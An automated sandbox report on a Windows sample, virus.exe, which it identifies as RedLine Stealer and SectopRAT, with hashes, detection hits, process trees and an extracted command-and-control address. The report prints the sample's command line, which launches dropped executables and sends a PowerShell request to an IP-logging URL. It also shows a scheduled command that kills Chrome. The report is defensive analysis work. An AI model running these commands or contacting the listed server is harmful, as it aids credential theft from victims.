Analysis
-
max time kernel
284s -
max time network
297s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
17/04/2023, 19:12
Static task
static1
Behavioral task
behavioral1
Sample
virus.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
virus.exe
Resource
win10v2004-20230220-en
General
-
Target
virus.exe
-
Size
508KB
-
MD5
43967615d9e0e19bc59d32fdb5afd7e4
-
SHA1
491d185c5fb89a0b72c1d9c61364f35a6d381fb4
-
SHA256
f296b101028093e2c43930229590375a8a73335d08022c28d9c1cf0f84efb5b8
-
SHA512
c122f036aba5d8c4a23d28d7d225d2e654bbcd32dc8a00a046501882b8410b87343f24380c2ab639a81a84581a39d7eadd4ee5191d74991f9d546d862f6e5123
-
SSDEEP
6144:PtZlz6dpdLXUJkD6NS/H34jUrJ5yrIkzGbnuMKcAXDguOZ4KZGMI9Pp2T041v:Vz6dpdoymNS/ojoAOuMPAzMGMIp0J5
Malware Config
Extracted
redline
MrPenguin
86.38.225.74:16808
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral1/files/0x0009000000014698-63.dat family_redline behavioral1/files/0x0009000000014698-62.dat family_redline behavioral1/files/0x0009000000014698-61.dat family_redline behavioral1/memory/572-69-0x0000000000A60000-0x0000000000A7E000-memory.dmp family_redline behavioral1/memory/1536-72-0x0000000002710000-0x0000000002750000-memory.dmp family_redline -
SectopRAT payload 5 IoCs
resource yara_rule behavioral1/files/0x0009000000014698-63.dat family_sectoprat behavioral1/files/0x0009000000014698-62.dat family_sectoprat behavioral1/files/0x0009000000014698-61.dat family_sectoprat behavioral1/memory/572-69-0x0000000000A60000-0x0000000000A7E000-memory.dmp family_sectoprat behavioral1/memory/1536-72-0x0000000002710000-0x0000000002750000-memory.dmp family_sectoprat -
Find unpacked information stealer based on crypto desktop apps 5 IoCs
Detects infostealer.
resource yara_rule behavioral1/files/0x0009000000014698-63.dat infostealer_generic_crypto_desktop behavioral1/files/0x0009000000014698-62.dat infostealer_generic_crypto_desktop behavioral1/files/0x0009000000014698-61.dat infostealer_generic_crypto_desktop behavioral1/memory/572-69-0x0000000000A60000-0x0000000000A7E000-memory.dmp infostealer_generic_crypto_desktop behavioral1/memory/1536-72-0x0000000002710000-0x0000000002750000-memory.dmp infostealer_generic_crypto_desktop -
Find unpacked information stealer based on crypto extension 5 IoCs
Detects infostealer.
resource yara_rule behavioral1/files/0x0009000000014698-63.dat infostealer_generic_crypto_extension behavioral1/files/0x0009000000014698-62.dat infostealer_generic_crypto_extension behavioral1/files/0x0009000000014698-61.dat infostealer_generic_crypto_extension behavioral1/memory/572-69-0x0000000000A60000-0x0000000000A7E000-memory.dmp infostealer_generic_crypto_extension behavioral1/memory/1536-72-0x0000000002710000-0x0000000002750000-memory.dmp infostealer_generic_crypto_extension -
Find unpacked information stealer based on possible SQL query to retrieve broswer data 5 IoCs
Detects infostealer.
resource yara_rule behavioral1/files/0x0009000000014698-63.dat infostealer_generic_browser_sql behavioral1/files/0x0009000000014698-62.dat infostealer_generic_browser_sql behavioral1/files/0x0009000000014698-61.dat infostealer_generic_browser_sql behavioral1/memory/572-69-0x0000000000A60000-0x0000000000A7E000-memory.dmp infostealer_generic_browser_sql behavioral1/memory/1536-72-0x0000000002710000-0x0000000002750000-memory.dmp infostealer_generic_browser_sql -
Executes dropped EXE 2 IoCs
pid Process 572 build.exe 336 Yosdofwiqay.exe -
Loads dropped DLL 5 IoCs
pid Process 1700 virus.exe 1124 cmd.exe 1124 cmd.exe 1124 cmd.exe 1872 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process 836 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 572 build.exe Token: SeDebugPrivilege 836 taskkill.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1700 wrote to memory of 1124 1700 virus.exe 27 PID 1700 wrote to memory of 1124 1700 virus.exe 27 PID 1700 wrote to memory of 1124 1700 virus.exe 27 PID 1700 wrote to memory of 1124 1700 virus.exe 27 PID 1124 wrote to memory of 572 1124 cmd.exe 29 PID 1124 wrote to memory of 572 1124 cmd.exe 29 PID 1124 wrote to memory of 572 1124 cmd.exe 29 PID 1124 wrote to memory of 572 1124 cmd.exe 29 PID 1124 wrote to memory of 336 1124 cmd.exe 31 PID 1124 wrote to memory of 336 1124 cmd.exe 31 PID 1124 wrote to memory of 336 1124 cmd.exe 31 PID 1124 wrote to memory of 336 1124 cmd.exe 31 PID 1124 wrote to memory of 1536 1124 cmd.exe 33 PID 1124 wrote to memory of 1536 1124 cmd.exe 33 PID 1124 wrote to memory of 1536 1124 cmd.exe 33 PID 1124 wrote to memory of 1536 1124 cmd.exe 33 PID 888 wrote to memory of 556 888 taskeng.exe 35 PID 888 wrote to memory of 556 888 taskeng.exe 35 PID 888 wrote to memory of 556 888 taskeng.exe 35 PID 556 wrote to memory of 836 556 CMD.EXE 37 PID 556 wrote to memory of 836 556 CMD.EXE 37 PID 556 wrote to memory of 836 556 CMD.EXE 37 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\virus.exe"C:\Users\Admin\AppData\Local\Temp\virus.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "build.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Users\Admin\AppData\Local\Temp\build.exe"build.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe"Yosdofwiqay.exe"3⤵
- Executes dropped EXE
PID:336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2DFD6DF9-EA9C-4CE4-AE18-3BF33843CAA3} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SYSTEM32\CMD.EXEC:\Windows\SYSTEM32\CMD.EXE /c taskkill /im chrome.exe /f2⤵
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\system32\taskkill.exetaskkill /im chrome.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
558KB
MD561bb691f0c875d3d82521a6fa878e402
SHA1e987b42ef3f2ae177e34fc77734f20a54298cae6
SHA2566e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008
SHA5122e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b
-
Filesize
558KB
MD561bb691f0c875d3d82521a6fa878e402
SHA1e987b42ef3f2ae177e34fc77734f20a54298cae6
SHA2566e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008
SHA5122e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b
-
Filesize
95KB
MD50a62437e59df248af2eda97203611906
SHA1b4407082f44e48389cf122e15cdbffd8f7e26619
SHA2563fc8460a4875efb2ab36a9677d4119c6d473c829070290313dbf881bf84e86ae
SHA512e2e95da15ad5afa28c309377288a26a73dd417c428abf10398ea4a35814fa8fbeed141100221df7097406610bbe445a932b40a4179ff3ed87f64c395afe0dddb
-
Filesize
95KB
MD50a62437e59df248af2eda97203611906
SHA1b4407082f44e48389cf122e15cdbffd8f7e26619
SHA2563fc8460a4875efb2ab36a9677d4119c6d473c829070290313dbf881bf84e86ae
SHA512e2e95da15ad5afa28c309377288a26a73dd417c428abf10398ea4a35814fa8fbeed141100221df7097406610bbe445a932b40a4179ff3ed87f64c395afe0dddb
-
Filesize
6KB
MD5293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
-
Filesize
558KB
MD561bb691f0c875d3d82521a6fa878e402
SHA1e987b42ef3f2ae177e34fc77734f20a54298cae6
SHA2566e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008
SHA5122e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b
-
Filesize
558KB
MD561bb691f0c875d3d82521a6fa878e402
SHA1e987b42ef3f2ae177e34fc77734f20a54298cae6
SHA2566e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008
SHA5122e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b
-
Filesize
558KB
MD561bb691f0c875d3d82521a6fa878e402
SHA1e987b42ef3f2ae177e34fc77734f20a54298cae6
SHA2566e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008
SHA5122e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b
-
Filesize
95KB
MD50a62437e59df248af2eda97203611906
SHA1b4407082f44e48389cf122e15cdbffd8f7e26619
SHA2563fc8460a4875efb2ab36a9677d4119c6d473c829070290313dbf881bf84e86ae
SHA512e2e95da15ad5afa28c309377288a26a73dd417c428abf10398ea4a35814fa8fbeed141100221df7097406610bbe445a932b40a4179ff3ed87f64c395afe0dddb
-
Filesize
6KB
MD5293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19